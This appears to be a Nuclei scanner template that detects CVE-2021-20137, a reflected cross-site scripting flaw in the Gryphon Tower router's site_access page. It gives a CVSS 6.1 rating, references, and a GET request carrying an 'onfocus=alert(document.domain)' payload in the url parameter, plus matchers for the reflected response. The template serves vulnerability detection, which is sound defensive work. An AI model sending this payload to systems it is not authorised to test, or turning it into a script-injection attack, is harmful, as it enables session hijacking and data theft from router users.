id: CVE-2021-20137

info:
  name: Gryphon Tower - Cross-Site Scripting
  author: edoardottt
  severity: medium
  description: Gryphon Tower router web interface contains a reflected cross-site scripting vulnerability in the url parameter of the /cgi-bin/luci/site_access/ page. An attacker can exploit this issue by tricking a user into following a specially crafted link, granting the attacker JavaScript execution in the victim's browser.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20137
    - https://www.tenable.com/security/research/tra-2021-51
    - https://nvd.nist.gov/vuln/detail/CVE-2021-20137
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-20137
    cwe-id: CWE-79
    epss-score: 0.23391
    epss-percentile: 0.96553
    cpe: cpe:2.3:h:gryphonconnect:gryphon_tower:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: gryphonconnect
    product: gryphon_tower
  tags: cve2021,cve,xss,tenable,gryphon,gryphonconnect

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1"

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"

      - type: word
        part: body
        words:
          - 'onfocus=alert(document.domain) autofocus=1>'
          - 'Send Access Request URL'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022049f2894ee588135a6a13253759fa5b88d04d2fe0f2201d32461a28f241c391ba022100eb9a471bd5244b567e1ba910c206db4fa8720ef5a838a1620da8ad6b5ee96ed2:922c64590222798bb761d5b6d8e72950